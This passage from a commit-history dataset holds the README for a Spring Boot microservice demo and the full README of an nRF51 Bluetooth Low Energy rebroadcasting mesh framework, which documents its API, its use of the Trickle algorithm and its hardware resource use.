Minutes\n\nThis is the source code for my conference sessions about creating and deploying\na microservice with Spring Boot, Angular and Docker.\n\n== Getting Started\n\n* Make sure Java 8 JDK is installed\n* Open a terminal and invoke \".\/gradlew build bootrun\" (just \"gradlew\" under Windows)\n* Open a Web browser at http:\/\/localhost:8080\n\n== Travis CI\nYou can browse the latest Travis CI build at https:\/\/travis-ci.org\/toedter\/microservice-60min\n\n== Heroku\n\nTravis CI deploys the resulting Docker container to Heroku,\nyou find the latest version running at\nhttps:\/\/microservice-60min.herokuapp.com\n\n== REST API\nYou can browse the REST API with the HAL-Explorer at\nhttps:\/\/microservice-60min.herokuapp.com\/webjars\/hal-explorer\/0.9.5\/index.html#theme=Cosmo&url=\/api\/\n\n\n","old_contents":"image:https:\/\/travis-ci.org\/toedter\/microservice-60min.svg?branch=master[Build Status, link=\"https:\/\/travis-ci.org\/toedter\/microservice-60min\"]\nimage:http:\/\/img.shields.io\/badge\/license-MIT-blue.svg[\"MIT\", link=\"http:\/\/toedter.mit-license.org\"]\n\n\n= A Microservice in 60 Minutes\n\nThis is the source code for my conference sessions about creating and deploying\na microservice with Spring Boot, Angular and Docker.\n\n== Getting Started\n\n* Make sure Java 8 JDK is installed\n* Open a terminal and invoke \".\/gradlew build bootrun\" (just \"gradlew\" under Windows)\n* Open a Web browser at http:\/\/localhost:8080\n\n== Travis CI\nYou can browse th latest Travis CI build at https:\/\/travis-ci.org\/toedter\/microservice-60min\n\n== Heroku\n\nTravis CI deploys the resulting Docker container to Heroku,\nyou find the latest version running at\nhttps:\/\/microservice-60min.herokuapp.com\n\n== REST API\nYou can browse the REST API with the HAL-Explorer at\nhttps:\/\/microservice-60min.herokuapp.com\/webjars\/hal-explorer\/0.9.5\/index.html#theme=Cosmo&url=\/api\/\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"25516d6a82d258328d5b54df2fa81540663eb882","subject":"README: clarification about role in master thesis","message":"README: clarification about role in master thesis","repos":"ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= nRF51-ble-broadcast-mesh\n\nBluetooth Low Energy based Rebroadcasting mesh implementation on the nRF51.\nWorks with Softdevice S110 v7.x with Timeslot API.\nOffers an API for implementing your own mesh enabled application, operating\nconcurrently with regular BLE applications.\n\n== Usage\nIn addition to two provided examples, there is a template project under\n_examples\/_. This may be used as a basis for your own applications, or you\ncould choose to do it yourself from scratch. In theory, the framework should be\ncompatible with most Softdevice based projects, but some restrictions to\nhardware and software modules apply, see <<resource-allocation>> for details.\nThe framework adds a Mesh GATT service to the Softdevice GATT server which\ncontain all mesh-global states. This service may be accessed by external nodes,\njust as any other GATT service, through a connection established via the\nSoftdevice. See section <<gatt-service>> for details about structure and\naccess. \n\n== Basic concepts\n\nA rebroadcasting mesh network works by flooding all messages to all nodes \nin the network through broadcasts. Each time a device receives a broadcast\nmessage from some other device in the mesh, it repeats the message, or \n_rebroadcasts_ it, letting its neighbors hear the new message. \nThe neighbors rebroadcast the message to their neighbors, and the process\nis repeated until all devices in the mesh have received the message. This \nlets wireless devices talk to eachother without being within direct radio \nrange, as devices between them help relaying the messages.\n\nThe Rebroadcasting Mesh framework (hereby referred to as \"the framework\" or\nrbc_mesh) provides a connection-less, rebroadcasting infrastructure for\nsynchronizing states across a set of BLE enabled nodes. All nodes receive all\nmessages that are transmitted within their range, and any node may update the\nmesh-global states. There is no hierarchy, and no directed data links. \n\nThe framework resides on top of the nRF51 Softdevice, utilizing the Timeslot\nAPI to allocate radio time. The framework will attempt to allocate as much time\nas possible, in order to listen for other nodes' messages.\n\nAll nodes in the mesh share a set of indexed dataslots. The data contained at each\nindex is propagated through the mesh with version numbers, with the objective of \nsynchronizing the same version of the data across all nodes in the mesh. Each \ntime a node overwrites a value, it increments the version number, and all nodes \nthat receive a broadcast message with a version number that is higher than the \none in its database, will adapt this new version of the value. \n\nThe value propagation is controlled by an implementation of the IETF RFC6206\n\"Trickle\", a flood control algorithm for lossy, low power networks. The Trickle\nalgorithm dynamically decides intervals at which a value will be broadcasted by\na node, based on how many consistent messages the node picks up, and when the last\nupdate to the state it manages was. The Trickle algorithm dynamically adapts to\nnode density and value update frequency.\n\nThe framework provides each handle-value pair with one Trickle-instance (an\nisolated version of the algorithm), and utilizes the Softdevice GATT server\nstructure to store the values. All values are stored as characteristics within\none \"Mesh\"-GATT Service, which is accessible to external nodes through a\nclassic BLE Softdevice connection, implemented in application space. The \"BLE\nGateway example\" displays a way to achieve such behavior.\n\n== Structure\nThe project is split into two parts: _rbc_mesh\/_ (the framework), and a folder with\nexamples. The framework is interfaced through a set of API functions,\nexclusively contained in the _rbc_mesh.h_ file. \n\nimage::docs\/architecture.png[Framework modules]\n\n=== Framework Modules\nThe framework is split into several separate modules, each of which is\nresponsible for managing various aspects of the framework.\n\n* *rbc_mesh* The top module of the framework, contains all API functions and is\nthe only module that should be accessed by the application.\n\n* *mesh_srv* The value storage module, communicates with the Softdevice's GATT\nserver, and maps all handles to GATT characteristics.\n\n* *timeslot_handler* A module communicating with and abstracting the nRF51\nSoftdevice Timeslot API and manages the two interrupt contexts the framework\nruns in.\n\n* *trickle* Implementation of the IETF RFC6206 \"Trickle\" algorithm for\nmesh-global state propagation.\n\n* *transport_control* Lower level packet handler. Abstracts the radio interface and\npacket format for the mesh_srv-module. \n\n* *radio_control* Asynchronous radio abstraction. Offers a way for higher level\nmodules to queue radio events and packets, and also provides callbacks on\nvarious radio events.\n\n* *timer_control* Interfaces the NRF_TIMER0 hardware module by managing timer\ncapture allocations and callbacks. Tightly integrated with the radio module.\n\n=== API\n\nThe API is exclusively contained in the _rbc_mesh.h_ file in _rbc_mesh\/_, and\nwhile the other framework files need to be included in the build process or\nKeil project, they should not be interfaced directly. Note that all API\nfunctions except the getters for metadata calls Softdevice SVC functions, and\nconsequently, all use of the API must happen in interrupt context APP_LOW or MAIN. \nThe framework event callback function runs in priority 3 (APP_LOW), and it is\nsafe to use the API from this context.\n\n==== The API provides the following functions to the user:\n\n*Initialize framework*\n[source,c]\n----\nuint32_t rbc_mesh_init(uint32_t access_addr, \n uint8_t channel, \n uint8_t handle_count, \n uint8_t adv_int_ms); \n----\nThis function must be called before any other framework function, and sets up\nthe Mesh GATT service and enables listening for incoming mesh messages.\n\nAll nodes within the same mesh network must be set up with the same access\naddress and channel, but handle_count and adv_int_ms may be different. \n\n'''\n\n*Manually enable broadcasting of a given value*\n[source,c]\n----\nuint32_t rbc_mesh_value_enable(uint8_t handle);\n----\nStart broadcasting the indicated value to other nodes, without updating the\ncontents of the value. If the handle-value pair has never been used before, the\nframework forces the node to broadcast an empty version 0-message to\nother nodes, which, in turn will answer with their version of the\nhandle-value-pair. This way, new nodes may get up to date with the rest of the\nnodes in the mesh.\n\n'''\n\n*Disable broadcasting of a given value*\n[source,c]\n----\nuint32_t rbc_mesh_value_disable(uint8_t handle);\n----\nStop broadcasting the indicated handle-value pair. Note that the framework will\nkeep updating the local version of the variable when external nodes write to\nit, and consequently notify the application about the update as usual. The\nframework will not, however, rebroadcast the value to other nodes, but rather\ntake a passive role in the mesh for this handle-value pair.\n\n'''\n\n*Update value*\n[source,c]\n----\nuint32_t rbc_mesh_value_set(uint8_t handle, uint8_t* data, uint16_t len);\n----\nUpdate the value represented by the given handle. This will bump the version\nnumber on the handle-value pair, and broadcast this new version to the rest of\nthe nodes in the mesh. \n\nThe `data` array may at most be 28 bytes long, and an error will be returned if\nthe len parameter exceeds this limitation.\n\n'''\n\n*Get value*\n[source,c]\n----\nuint32_t rbc_mesh_value_get(uint8_t handle, \n uint8_t* data, \n uint16_t* len,\n ble_gap_addr_t* origin_addr);\n----\nReturns the most recent value paired with this handle. The `data` buffer must\nbe at least 28 bytes long in order to ensure memory safe behavior. The actual\nlength of the data is returned in the `length` parameter. The `origin_addr`\nparameter returns the address of the node that first started broadcasting the\ncurrent version of the message.\n\n'''\n\n*Get operational access address*\n[source,c]\n----\nuint32_t rbc_mesh_access_address_get(uint32_t* access_address);\n----\nReturns the access address specified in the initialization function in the\n`access_address` parameter.\n\n'''\n\n*Get operational channel*\n[source,c]\n----\nuint32_t rbc_mesh_channel_get(uint8_t* channel);\n----\nReturns the channel specified in the initialization function in the\n`channel` parameter.\n\n'''\n\n*Get handle count*\n[source,c]\n----\nuint32_t rbc_mesh_handle_count_get(uint8_t* handle_count);\n----\nReturns the handle count specified in the initialization function in the\n`handle_count` parameter. \n\n'''\n\n*Get minimum advertisement interval*\n[source,c]\n----\nuint32_t rbc_mesh_adv_int_get(uint32_t* adv_int_ms);\n----\nReturns the minimum advertisement interval specified in the initialization\nfunction in the `adv_int_ms` parameter. \n\n'''\n\n*BLE event handler*\n[source,c]\n----\nuint32_t rbc_mesh_ble_evt_handler(ble_evt_t* evt);\n----\nSoftdevice BLE event handler. Must be called by the application if the\nsoftdevice function `sd_ble_evt_get()` returns a new event. This will update\nversion numbers and transmit data if any of the value-characteristics in the\nmesh service has been written to through an external softdevice connection. May\nbe omitted if the application never uses any external connections through the\nsoftdevice.\n\n'''\n\n*Softdevice event handler*\n[source,c]\n----\nuint32_t rbc_mesh_sd_irq_handler(void);\n----\nHandles and consumes any pure softdevice events (excluding softdevice BLE\n events. See the official\n https:\/\/devzone.nordicsemi.com\/docs\/[Softdevice documentation] for\n details). Should be called on each call to `SD_IRQHandler()`.\n\n==== Return values\nAll API functions return a 32bit status code, as defined by the nRF51 SDK. All \nfunctions will return `NRF_SUCCESS` upon successful completion, and all\nfunctions except the `rbc_mesh_init()` function return\n`NRF_ERROR_INVALID_STATE` if the framework has not been initialized. All\npossible return codes for the individual API functions (and their meaning)\nare defined in the `rbc_mesh.h` file. \n\n==== Framework events\nIn addition to the provided API functions, the framework provides an event\nqueue for the application. These events are generated in the framework and\nshould be handled by the application in an implementation of the\n`rbc_mesh_event_handler()` function defined in _rbc_mesh.h_. The events come in\nthe shape of `rbc_mesh_event_t*` structs, with an event type, a handle number,\n a data array and an originator address.\n\nThe framework may produce the following events:\n\n* *Update*: The value addressed by the given handle has been updated from an\nexternal node with the given address, and now contains the data array\nprovided in the event-structure.\n\n* *Conflicting*: A value with the same version number, but different data or\noriginator has arrived at the node, and this new, conflicting value is provided\nwithin the event-structure. The value is *not* overwritten in the database, but\nthe application is free to do this with a call to `rbc_mesh_value_set()`.\n\n* *New*: The node has received an update to the indicated handle-value pair,\nwhich was not previously active.\n\n=== Examples\n\nThe project contains two simple examples and one template project. The two\nexamples are designed to operate together, and show off an extremely simple\nexample scenario where two handle-value pairs decides the state of the two LEDs\non the nRF51 evkit (or red and green LED on the nRF51 dongle). The examples\nhave been tested with boards PCA10000, PCA10001, PCA10031 and PCA10003.\n\nThe template provides a basis for implementing your own applications with the\nframework, and addresses the different eventhandlers and initialization\nfunctions, without any additional functionality.\n\n==== LED Mesh example\nThis example reads the buttons on the nRF51 evkit boards, and sets the LEDs\naccordingly. It also broadcasts the state of the LEDs to the other nodes in the\nsame mesh, which will copy the state of the node that registered a button push.\nThis example can also be flashed to the nRF51 dongles (PCA10000 and PCA10031), \neven though these boards don't have any GPIO actions enabled. The dongle-nodes \nwill act as active slaves, copying and rebroadcasting the LED states of other \nnodes.\n\n==== BLE Gateway example\nThis example uses the same configuration for LEDs as the LED Mesh example, but\nprovides a S110 Softdevice profile for communication with external nodes in\nstead of a physical interface. The example application starts sending\nregular connectable BLE advertisements with the Softdevice, and displays the\nMesh service in its GATT server, so that external nodes may write to the two\nLED config values as if they were regular characteristics. \n\n== How it works\n=== GATT Service\nAll values are stored as separate characteristics in the Softdevice GATT server. These\ncharacteristics are all contained within one \"Mesh\" GATT service, along with\none metadata characteristic containing information about the state of the mesh.\n\nThe GATT service and characteristics operate with their own 128 bit base UUID,\nwith the same base. \n\n.Assigned UUIDs\n|===\n|Value | UUID \n\n|Mesh service | 0x2A1E0001-FD51-D882-8BA8-B98C0000CD1E\n|Mesh metadata characteristic | 0x2A1E0002-FD51-D882-8BA8-B98C0000CD1E\n|Mesh value characteristic | 0x2A1E0003-FD51-D882-8BA8-B98C0000CD1E\n|===\n\n==== Mesh values\nThe Mesh value characteristics are the states that will be shared across the\nmesh. Each Mesh value may contain up to 28 bytes of data, and be updated from any\nnode in the mesh. \n\nThere may be up to 155 \"Mesh value\" characteristics in the mesh service in each\nnode, depending on configuration parameters provided to the `rbc_mesh_init()`\nfunction at runtime. Each mesh value will operate with their own instance of\nthe Trickle algorithm, meaning that they will be rebroadcasted independently.\nThe handles addressing the values are stored as standard https:\/\/developer.bluetooth.org\/gatt\/Pages\/GattNamespaceDescriptors.aspx[Bluetooth SIG\nnamespace descriptors], where the enumeration of each value is used as\na mesh-global handle.\n\n_NOTE:_ Because the Bluetooth SIG has defined namespace descriptor 0 as\n\"unknown\", the handles start at 1, and trying to access handle 0 returns an\nNRF_ERROR_INVALID_ADDR error.\n\n==== Mesh metadata\nFor ease of use, the service also provides a Metadata characteristic, providing\nconfiguration parameters for the mesh. This meatadata characteristic may be\nread by external nodes, and used for configuring new nodes that the user wishes\nto add to the mesh. The Metadata characteristic is structured as follows:\n\n[cols=\"3,1,1,6\", options=\"Header\"]\n.Metadata Characteristic Structure\n|===\n|Value | Position | Size | Description\n\n|Access Address | 0 | 4 bytes | The Access address the mesh operates on. \n|Advertisement interval | 4 | 4 bytes | The minimum advertisement interval each value\nis broadcasted with in milliseconds.\n|Value count | 8 | 1 byte | The amount of available value slots on the node\n|Channel | 9 | 1 byte | The BLE channel the mesh operates on\n|===\n\n\n\n=== Trickle Algorithm\nThe Trickle Algorithm was first presented by P. Levis of Stanford University\nand T. Clausen of LIX, Ecole Polytechnique in March 2010, and has since seen\nseveral revisions until it was published as RFC6202 in March 2011. The Trickle\nAlgorithm provides a method of controlled packet flooding across a mesh of\nlow-power lossy network nodes, by letting the nodes dynamically decide when to\nbroadcast their values based on network activity and when the last update to\nstate values arrived. \n\n==== A brief overview\nThe algorithm operate in exponentially growing time intervals of size I, starting at\ninterval size Imin, growing up to Imax. During an interval, it registers all\nincoming messages, where each message may be either consistent or inconsistent\nwith the nodes current state (the definition of consistency is left for the \nuser to decide). For each consistent message, a counter value, C is increased\nby one, and for each inconsistent message, if the interval size I is larger\nthan Imin, the interval timer is reset, and I is set to Imin. At the start of\neach interval, a timer T is set for a random time in the range `[I\/2, I)`. When\nthis timer expires, the node shall broadcast its state if the consistent\nmessage counter C is less than some redundancy constant K. At the end of each\ninterval, the interval length (I) is doubled if `I * 2 < Imax`, and C is reset.\n\nThe exponential growth and insconsistency reset functionality allows the nodes\nin the network to grow exponentially more silent as the state remains\nunchanged, but still stays responsive, as new information arrives. The\nconsistency counter C and redundancy constant K allows the system to\ndynamically adjust to network density, as nodes will choose not to transmit if\nthey've heard the same message from other nodes several times.\n\n==== Usage in the framework\nThe framework provides one instance of the Trickle Algorithm for each handle\nvalue pair (dubbed a Trickle instance). This means that when one value is frequently updated, while another\none remains unchanged, the node only rebroadcasts the active value frequently,\nkeeping the interval times for the static value high. Each handle-value pair\nalso comes with a version number, which increases by one for each fresh write\nto a value. This version number, along with a checksum allows the framework to\ndistinguish value consistency. If the node recevies a value update with a\nhigher version number than its own, it will automatically overwrite the\ncontents of the value data and notify the user. Any inconsistencies to both\nversion number and checksum results in a reset of interval timing for the value\nin question. \n\n==== Weaknesses in algorithm and implementation\nWhile the algorithm in its intended form provides a rather robust and\neffective packet propagation scheme, some necessary adjustments introduces a\nfew weaknesses. First off, using several instances of the algorithm on the same\nset of nodes yields a growth in on-air collisions and poorer frequency\nutilization control, as the individual instances take no consideration to\nthe others' activity. This means that the scheme doesn't scale that well with\nseveral handle value pairs, and the user is asked to consider this during\nimplementation. The choice of doing separate trickle instances is, however a\nresult of a tradeoff: If the entire node state shared one trickle instance, the\nentire state would be rebroadcasted each time a part of it is updated, \nand the amount of shareable data would be severely limited by packet size and\npacket chaining possibilities.\n\nAnother weakness in the adaption is caused by the fact that the Softdevice Timeslot API\nwon't let the framework get free access to the radio at all times, resulting in\na reduced on-air time for mesh related operations. When the\nSoftdevice operates in an advertising state, this problem only has an impact of\n5-25% reduction in potential on-air time for mesh operations, but in a\nconnected state with a short connection interval, the Softdevice may reduce\ntimeslots by as much as 80%. This results in a lot of missed packets to the\naffected node, and may dramatically increase propagation time to this\nnode. \n\n=== Timeslots\nThe framework does all mesh-related transmissions in timeslots granted by the\nSoftdevice Multiprotocol Timeslot API, operating directly on the radio hardware\nmodule. Timeslots are primarily allocated by extending, short timeslots into\ntimeslots of upto 1 second, and the framework will attempt to seize the radio \nfor as much as the Softdevice will allow. At the beginning of each timeslot, \nthe framework samples the RTC0 Low Frequency Timer, and checks whether any \ntimers related to the Trickle Algorithm have expired since the end of the \nprevious timeslot. If this is the case, the framework does all pending \noperations immediately. After this initial \"catch up\" operation, the framework \nhandles all operations as they appear for the remainder of the timeslot.\n\nFor details about the Softdevice Multiprotocol Timeslot API, plese refer to the\nSoftdevice Specification, available on the Nordic Semiconductor homepage.\n\n=== Air interface packets\nAll Mesh-related packets are broadcasted as regular BLE Nonconnectable\nAdvertisements, with a few differences: The Access address is set by the user,\nand does not have to match the Bluetooth Specification advertisement access\naddress. In addition, the Advertisement Address (GAP address) field provided after\nthe packet header, does not necessarily contain the Advertisement Address of\nthe node broadcasting the message, but rather the address of the mesh node at\nwhich the indicated version of the value-handle pair first appeared. The\npacket structure is illustrated below.\n\nimage::docs\/packet_format.png[Packet format on air]\n\n=== Resource allocation\nThe framework takes control over several hardware and software resources,\nmaking these unavailable to applications:\n\n* *Timeslot API* All callbacks for timeslot sessions are held by the framework,\n\n* *SWI0_IRQ* The Software interrupt is used for asynchronous packet processing \n\n* *NRF_TIMER0* HF timer 0 is reset and started by the Timeslot API at the\nbeginning of each timeslot, and all capture compare slots for this timer may be\nin use at any time\n\n* *NRF_RTC0* The Timeslot API uses RTC0 for timing, and manipulating this\nmodule will lead to undefined behavior or hardfaults in the Softdevice.\n\n* *NRF_PPI, channels 8-12* The framework uses PPI channel 8-12 for radio\noperation during timeslots, and the Softdevice may use channels 8+ outside them. Only\nchannels 0-7 are safely available to the application (just as with regular\n Softdevice applications).\n\nIn addition, the Softdevice may block some hardware blocks not listed here.\nPlease refer to the relevant Softdevice Specification for details (available at\nthe Nordic Semiconductor homepage).\n\n==== Memory\nThe framework allocates a metadata array on the heap, with 36bytes per\nhandle-value pair. The rest of the program operates strictly on the stack, and\ncompiled at Optimization level -O0, Keil reports a program size of approx.\n10kB, and stack size of 5.5kB for the Template project under `examples\/`.\n\n== Why this was made\nThis project is created in collaboration with The Norwegian University of \nScience and Technology (NTNU), as part of a master thesis. \n\n== Forum\nhttp:\/\/devzone.nordicsemi.com\/[Nordic Developer Zone]\n\n== Resources\nhttp:\/\/www.nordicsemi.com[Nordic Semiconductor Homepage] \n\nhttp:\/\/tools.ietf.org\/html\/rfc6206[Trickle Algorithm Specification]\n\n\n","old_contents":"= nRF51-ble-broadcast-mesh\n\nBluetooth Low Energy based Rebroadcasting mesh implementation on the nRF51.\nWorks with Softdevice S110 v7.x with Timeslot API.\nOffers an API for implementing your own mesh enabled application, operating\nconcurrently with regular BLE applications.\n\n== Usage\nIn addition to two provided examples, there is a template project under\n_examples\/_. This may be used as a basis for your own applications, or you\ncould choose to do it yourself from scratch. In theory, the framework should be\ncompatible with most Softdevice based projects, but some restrictions to\nhardware and software modules apply, see <<resource-allocation>> for details.\nThe framework adds a Mesh GATT service to the Softdevice GATT server which\ncontain all mesh-global states. This service may be accessed by external nodes,\njust as any other GATT service, through a connection established via the\nSoftdevice. See section <<gatt-service>> for details about structure and\naccess. \n\n== Basic concepts\n\nA rebroadcasting mesh network works by flooding all messages to all nodes \nin the network through broadcasts. Each time a device receives a broadcast\nmessage from some other device in the mesh, it repeats the message, or \n_rebroadcasts_ it, letting its neighbors hear the new message. \nThe neighbors rebroadcast the message to their neighbors, and the process\nis repeated until all devices in the mesh have received the message. This \nlets wireless devices talk to eachother without being within direct radio \nrange, as devices between them help relaying the messages.\n\nThe Rebroadcasting Mesh framework (hereby referred to as \"the framework\" or\nrbc_mesh) provides a connection-less, rebroadcasting infrastructure for\nsynchronizing states across a set of BLE enabled nodes. All nodes receive all\nmessages that are transmitted within their range, and any node may update the\nmesh-global states. There is no hierarchy, and no directed data links. \n\nThe framework resides on top of the nRF51 Softdevice, utilizing the Timeslot\nAPI to allocate radio time. The framework will attempt to allocate as much time\nas possible, in order to listen for other nodes' messages.\n\nAll nodes in the mesh share a set of indexed dataslots. The data contained at each\nindex is propagated through the mesh with version numbers, with the objective of \nsynchronizing the same version of the data across all nodes in the mesh. Each \ntime a node overwrites a value, it increments the version number, and all nodes \nthat receive a broadcast message with a version number that is higher than the \none in its database, will adapt this new version of the value. \n\nThe value propagation is controlled by an implementation of the IETF RFC6206\n\"Trickle\", a flood control algorithm for lossy, low power networks. The Trickle\nalgorithm dynamically decides intervals at which a value will be broadcasted by\na node, based on how many consistent messages the node picks up, and when the last\nupdate to the state it manages was. The Trickle algorithm dynamically adapts to\nnode density and value update frequency.\n\nThe framework provides each handle-value pair with one Trickle-instance (an\nisolated version of the algorithm), and utilizes the Softdevice GATT server\nstructure to store the values. All values are stored as characteristics within\none \"Mesh\"-GATT Service, which is accessible to external nodes through a\nclassic BLE Softdevice connection, implemented in application space. The \"BLE\nGateway example\" displays a way to achieve such behavior.\n\n== Structure\nThe project is split into two parts: _rbc_mesh\/_ (the framework), and a folder with\nexamples. The framework is interfaced through a set of API functions,\nexclusively contained in the _rbc_mesh.h_ file. \n\nimage::docs\/architecture.png[Framework modules]\n\n=== Framework Modules\nThe framework is split into several separate modules, each of which is\nresponsible for managing various aspects of the framework.\n\n* *rbc_mesh* The top module of the framework, contains all API functions and is\nthe only module that should be accessed by the application.\n\n* *mesh_srv* The value storage module, communicates with the Softdevice's GATT\nserver, and maps all handles to GATT characteristics.\n\n* *timeslot_handler* A module communicating with and abstracting the nRF51\nSoftdevice Timeslot API and manages the two interrupt contexts the framework\nruns in.\n\n* *trickle* Implementation of the IETF RFC6206 \"Trickle\" algorithm for\nmesh-global state propagation.\n\n* *transport_control* Lower level packet handler. Abstracts the radio interface and\npacket format for the mesh_srv-module. \n\n* *radio_control* Asynchronous radio abstraction. Offers a way for higher level\nmodules to queue radio events and packets, and also provides callbacks on\nvarious radio events.\n\n* *timer_control* Interfaces the NRF_TIMER0 hardware module by managing timer\ncapture allocations and callbacks. Tightly integrated with the radio module.\n\n=== API\n\nThe API is exclusively contained in the _rbc_mesh.h_ file in _rbc_mesh\/_, and\nwhile the other framework files need to be included in the build process or\nKeil project, they should not be interfaced directly. Note that all API\nfunctions except the getters for metadata calls Softdevice SVC functions, and\nconsequently, all use of the API must happen in interrupt context APP_LOW or MAIN. \nThe framework event callback function runs in priority 3 (APP_LOW), and it is\nsafe to use the API from this context.\n\n==== The API provides the following functions to the user:\n\n*Initialize framework*\n[source,c]\n----\nuint32_t rbc_mesh_init(uint32_t access_addr, \n uint8_t channel, \n uint8_t handle_count, \n uint8_t adv_int_ms); \n----\nThis function must be called before any other framework function, and sets up\nthe Mesh GATT service and enables listening for incoming mesh messages.\n\nAll nodes within the same mesh network must be set up with the same access\naddress and channel, but handle_count and adv_int_ms may be different. \n\n'''\n\n*Manually enable broadcasting of a given value*\n[source,c]\n----\nuint32_t rbc_mesh_value_enable(uint8_t handle);\n----\nStart broadcasting the indicated value to other nodes, without updating the\ncontents of the value. If the handle-value pair has never been used before, the\nframework forces the node to broadcast an empty version 0-message to\nother nodes, which, in turn will answer with their version of the\nhandle-value-pair. This way, new nodes may get up to date with the rest of the\nnodes in the mesh.\n\n'''\n\n*Disable broadcasting of a given value*\n[source,c]\n----\nuint32_t rbc_mesh_value_disable(uint8_t handle);\n----\nStop broadcasting the indicated handle-value pair. Note that the framework will\nkeep updating the local version of the variable when external nodes write to\nit, and consequently notify the application about the update as usual. The\nframework will not, however, rebroadcast the value to other nodes, but rather\ntake a passive role in the mesh for this handle-value pair.\n\n'''\n\n*Update value*\n[source,c]\n----\nuint32_t rbc_mesh_value_set(uint8_t handle, uint8_t* data, uint16_t len);\n----\nUpdate the value represented by the given handle. This will bump the version\nnumber on the handle-value pair, and broadcast this new version to the rest of\nthe nodes in the mesh. \n\nThe `data` array may at most be 28 bytes long, and an error will be returned if\nthe len parameter exceeds this limitation.\n\n'''\n\n*Get value*\n[source,c]\n----\nuint32_t rbc_mesh_value_get(uint8_t handle, \n uint8_t* data, \n uint16_t* len,\n ble_gap_addr_t* origin_addr);\n----\nReturns the most recent value paired with this handle. The `data` buffer must\nbe at least 28 bytes long in order to ensure memory safe behavior. The actual\nlength of the data is returned in the `length` parameter. The `origin_addr`\nparameter returns the address of the node that first started broadcasting the\ncurrent version of the message.\n\n'''\n\n*Get operational access address*\n[source,c]\n----\nuint32_t rbc_mesh_access_address_get(uint32_t* access_address);\n----\nReturns the access address specified in the initialization function in the\n`access_address` parameter.\n\n'''\n\n*Get operational channel*\n[source,c]\n----\nuint32_t rbc_mesh_channel_get(uint8_t* channel);\n----\nReturns the channel specified in the initialization function in the\n`channel` parameter.\n\n'''\n\n*Get handle count*\n[source,c]\n----\nuint32_t rbc_mesh_handle_count_get(uint8_t* handle_count);\n----\nReturns the handle count specified in the initialization function in the\n`handle_count` parameter. \n\n'''\n\n*Get minimum advertisement interval*\n[source,c]\n----\nuint32_t rbc_mesh_adv_int_get(uint32_t* adv_int_ms);\n----\nReturns the minimum advertisement interval specified in the initialization\nfunction in the `adv_int_ms` parameter. \n\n'''\n\n*BLE event handler*\n[source,c]\n----\nuint32_t rbc_mesh_ble_evt_handler(ble_evt_t* evt);\n----\nSoftdevice BLE event handler. Must be called by the application if the\nsoftdevice function `sd_ble_evt_get()` returns a new event. This will update\nversion numbers and transmit data if any of the value-characteristics in the\nmesh service has been written to through an external softdevice connection. May\nbe omitted if the application never uses any external connections through the\nsoftdevice.\n\n'''\n\n*Softdevice event handler*\n[source,c]\n----\nuint32_t rbc_mesh_sd_irq_handler(void);\n----\nHandles and consumes any pure softdevice events (excluding softdevice BLE\n events. See the official\n https:\/\/devzone.nordicsemi.com\/docs\/[Softdevice documentation] for\n details). Should be called on each call to `SD_IRQHandler()`.\n\n==== Return values\nAll API functions return a 32bit status code, as defined by the nRF51 SDK. All \nfunctions will return `NRF_SUCCESS` upon successful completion, and all\nfunctions except the `rbc_mesh_init()` function return\n`NRF_ERROR_INVALID_STATE` if the framework has not been initialized. All\npossible return codes for the individual API functions (and their meaning)\nare defined in the `rbc_mesh.h` file. \n\n==== Framework events\nIn addition to the provided API functions, the framework provides an event\nqueue for the application. These events are generated in the framework and\nshould be handled by the application in an implementation of the\n`rbc_mesh_event_handler()` function defined in _rbc_mesh.h_. The events come in\nthe shape of `rbc_mesh_event_t*` structs, with an event type, a handle number,\n a data array and an originator address.\n\nThe framework may produce the following events:\n\n* *Update*: The value addressed by the given handle has been updated from an\nexternal node with the given address, and now contains the data array\nprovided in the event-structure.\n\n* *Conflicting*: A value with the same version number, but different data or\noriginator has arrived at the node, and this new, conflicting value is provided\nwithin the event-structure. The value is *not* overwritten in the database, but\nthe application is free to do this with a call to `rbc_mesh_value_set()`.\n\n* *New*: The node has received an update to the indicated handle-value pair,\nwhich was not previously active.\n\n=== Examples\n\nThe project contains two simple examples and one template project. The two\nexamples are designed to operate together, and show off an extremely simple\nexample scenario where two handle-value pairs decides the state of the two LEDs\non the nRF51 evkit (or red and green LED on the nRF51 dongle). The examples\nhave been tested with boards PCA10000, PCA10001, PCA10031 and PCA10003.\n\nThe template provides a basis for implementing your own applications with the\nframework, and addresses the different eventhandlers and initialization\nfunctions, without any additional functionality.\n\n==== LED Mesh example\nThis example reads the buttons on the nRF51 evkit boards, and sets the LEDs\naccordingly. It also broadcasts the state of the LEDs to the other nodes in the\nsame mesh, which will copy the state of the node that registered a button push.\nThis example can also be flashed to the nRF51 dongles (PCA10000 and PCA10031), \neven though these boards don't have any GPIO actions enabled. The dongle-nodes \nwill act as active slaves, copying and rebroadcasting the LED states of other \nnodes.\n\n==== BLE Gateway example\nThis example uses the same configuration for LEDs as the LED Mesh example, but\nprovides a S110 Softdevice profile for communication with external nodes in\nstead of a physical interface. The example application starts sending\nregular connectable BLE advertisements with the Softdevice, and displays the\nMesh service in its GATT server, so that external nodes may write to the two\nLED config values as if they were regular characteristics. \n\n== How it works\n=== GATT Service\nAll values are stored as separate characteristics in the Softdevice GATT server. These\ncharacteristics are all contained within one \"Mesh\" GATT service, along with\none metadata characteristic containing information about the state of the mesh.\n\nThe GATT service and characteristics operate with their own 128 bit base UUID,\nwith the same base. \n\n.Assigned UUIDs\n|===\n|Value | UUID \n\n|Mesh service | 0x2A1E0001-FD51-D882-8BA8-B98C0000CD1E\n|Mesh metadata characteristic | 0x2A1E0002-FD51-D882-8BA8-B98C0000CD1E\n|Mesh value characteristic | 0x2A1E0003-FD51-D882-8BA8-B98C0000CD1E\n|===\n\n==== Mesh values\nThe Mesh value characteristics are the states that will be shared across the\nmesh. Each Mesh value may contain up to 28 bytes of data, and be updated from any\nnode in the mesh. \n\nThere may be up to 155 \"Mesh value\" characteristics in the mesh service in each\nnode, depending on configuration parameters provided to the `rbc_mesh_init()`\nfunction at runtime. Each mesh value will operate with their own instance of\nthe Trickle algorithm, meaning that they will be rebroadcasted independently.\nThe handles addressing the values are stored as standard https:\/\/developer.bluetooth.org\/gatt\/Pages\/GattNamespaceDescriptors.aspx[Bluetooth 